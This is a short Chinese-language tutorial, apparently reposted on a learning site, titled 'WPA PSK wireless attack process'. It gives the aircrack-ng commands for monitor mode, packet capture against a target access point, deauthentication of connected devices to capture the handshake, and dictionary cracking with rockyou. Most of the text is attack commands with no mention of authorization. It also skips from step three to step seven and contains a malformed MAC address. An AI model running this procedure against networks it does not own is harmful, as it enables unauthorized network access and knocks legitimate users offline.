WPA PSK 无线攻击流程

懵懂的女人 提交于 2019-11-30 02:12:48

第一步:进入Monitor 模式

airmon-ng   #查看当前使用无线网卡

airmon-ng check #查看可能影响无线扫描的进程

airmon-ng check kill #关闭有可能影响无线扫描的进程

airmon-ng start wlan0 #使用wlan0 进入Monitor模式

使用 iwconfig 命令 查看 wlanmon的 Mode项是否切换为Monitor模式

第二步:启动抓包并保存数据包

airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w wpa #--bssid 监听指定MAC的设备 -c 是指定信道 -w 把监听的数据包写入文件

第三步:Deauthentication 抓取XOR文件(有无线设备已经连接上路由器)

发送解除数据包打断现在与AP(路由器)连接的设备(手机,笔记本等),让设备再次重新连接

aireplay-ng -0 1 -a EC:26:CADC:29:B6 -c 68:3E:34:30:0F:AA wlan0mon# -0打断指令  1 进行一次尝试 -a 路由器的mac  -c要断开的无线设备MAC地址 wlan0mon 使用的无线网卡

出现 handshake说明成功获取四次握手信息:

第七步:使用密码字典进行攻击(可用kali自带,也可用网上下载或者自己组合生成的字典)

aircrack-ng -w /usr/share/john/password.lst wpa-01.cap   # -w 使用的字典 

/usr/share/wordlist 里面有一个比较大的字典(一千多万个密码):rockyou.txt.gz,可解压后用

最后得出密码:

 

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!